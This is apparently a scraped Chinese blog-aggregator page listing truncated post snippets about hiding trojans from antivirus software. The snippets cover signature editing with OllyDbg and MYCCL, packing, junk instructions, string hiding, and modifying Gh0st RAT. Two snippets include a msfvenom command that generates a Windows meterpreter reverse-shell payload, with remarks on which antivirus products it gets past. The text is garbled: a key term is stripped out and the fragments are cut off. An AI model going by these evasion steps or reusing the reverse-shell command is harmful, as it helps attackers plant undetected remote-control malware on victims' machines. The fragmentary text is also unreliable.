一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。 2.内存的和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入, 一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:
转载 2010-02-13 02:48:28
667阅读
脱壳技术
翻译 精选 2012-11-07 20:04:51
494阅读
1.基础的汇编语言 2.修改工具(不指那些傻瓜式软件).如:   OllyDbg . PEditor. C32ASM . MYCCL复合特征码定位器.UE .OC. 资源编辑器等.还有一些查壳 脱壳软件(如PEID RL脱壳机等) . 以下是常用的几种方法及工具:&
原创 2012-05-14 19:11:00
424阅读
很不错的文章,拿出来晒晒  
转载 精选 2010-04-03 01:09:42
533阅读
环境——源码之C++编译 源码C++基础都一样 正常安装就行有的是这个版本这三个解压到 覆盖因为之前安装过了 就看下路径吧最后 提一下Assist 安装需要 进入那个vc98 目录去 安装破解如果缺dll 那就下一个加载就ok 源码C++基础 源码C++基础 技术交流 QQ群599020441 纪年科技aming #1 花指令 + pass 高启发语句 #2 字符串隐藏利用工
原创 2021-12-31 09:33:52
1235阅读
木马,在国内应该起源于05年吧.从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御.技术越来越难.但是万变不离其宗--改特征码.到现在一些辅助软件的行为查杀. 以下讲解都是以远程控制软件为例(这里补充一个概念,木马的反弹技术,就是服务端主动连接客户端.何谓主动连接呢,你只要把客户端软件在本机上开启后,中马的机子会主动连接上你的那个软件,而不必你去找他的IP,再与他连接
转载 2012-06-04 09:44:29
404阅读
Shellter是一个开源的工具,利用动态
转载 2023-05-20 02:49:48
131阅读
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会/x/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2022-02-28 11:07:56
310阅读
       去年年底的一段时间,工作较清闲,当时对做过一段时间研究。当时用的是hacksky的教程。不敢说对技术已经入门,但是当时做了一些学习笔记和学习感悟。hacksky的教程还是很不错的,因为工作的原因,当时没有全部看完,接下来有时间的话会把教程看完。这个大类以后主要记录关于技术方面的文章。文东工具包下
原创 2013-07-17 13:39:48
1097阅读
源码实战QQ 1285575001Wechat M010527技术交流 QQ群599020441纪年科技aming#1 看一下今天的马子Gh0st 改良版开始搞事原理病毒样本 内存地址/段 分析师定位原始特征码01-----> a02-----> b03-----> c (异常/病毒)04-----> ...
原创 2021-07-18 21:44:16
946阅读
源码QQ 1285575001Wechat M010527技术交流 QQ群599020441纪年科技aming特征码(淘汰)特征码定位(受干扰)360云引擎(环境变)断网 防上传 本地—> 联网(加体积-防干扰、上传) ——>云特征码特别多 用PE软件dump下 有效减少特征查杀定位小马 PE优化 (定位小马区段清零/随机再查杀)保护无...
原创 2021-07-18 20:19:36
1029阅读
测试
转载 2012-02-14 07:30:59
316阅读
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会把它干死不过,在电脑上装了360安全卫士的情况下,defender会被抑制,我们的后门就可以正常运行了先使用msfvenom生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2021-06-29 11:08:00
1018阅读
学习,首先你得学会汇编把,基础的指令要懂得一些,一般的指令修改必须会,一般的修改这里就不赘述了,接下来就是掌握一些常用的技巧,这里总结一些 第一:我们学习的方向:只是为了保护自己的黑软的话!就不会学的那么累(没必要去学汇编编程)有时候简单加下壳或者脱下壳就OK!如果是要挑战世界的杀毒软件的话,毕竟每个PC用户安装的软都不一样!想抓鸡拿服务器的朋友就要进修脱壳破解,高级汇编的内容了,这
转载 2009-05-11 18:51:58
1638阅读
文章原始出处:www.s5dofus.com                             &nbs
转载 精选 2009-12-12 12:13:38
1231阅读
干货|-C加载器尝试哆啦安全|知识星球上线啦(优惠券活动即将到期)!!!微信公众号
原创 2021-12-14 09:21:43
865阅读
通过代码直接调用System.Management,替代powershell.exe c#代码,保存为1.cs: using System.Collections.ObjectModel; using System.Management.Automation; using System.Manage ...
转载 2021-07-17 23:39:00
1573阅读
2评论
复制自TideSec 远控专题-基础篇 引⽤:http://www.myhack58.com/Article//2014/52200.htm 理论上讲,⼀定是出现在杀毒软件之后的。⽽通过杀毒软件的发展史不难知 道,第⼀款杀毒软件kill 1.0是Wish公司1987年推出的,也就是说
原创 2022-09-27 15:30:57
265阅读
(一)、应注意的事项:  1.的测试(在线杀毒、杀毒软件上报、世界反毒网:http://www.virustotal.com/zh-cn/) 在这里我建议大家不要上传自己的马到这样的网站上去.一上传不要多久就会被杀了.大家还是把软装在自己的电脑,然后测试比较好.  2.一个好的杀木马要过文件、内存、行为、主动防御等一些专杀软件.  3.目前一些常用的软有
原创 2009-07-25 22:12:58
2219阅读
2评论
webshellphp jsp https://xz.aliyun.com/t/10937https://xz.aliyun.com/t/10989php 传统php变形
原创 2022-04-29 21:48:25
53阅读
  • 1
  • 2
  • 3
  • 4
  • 5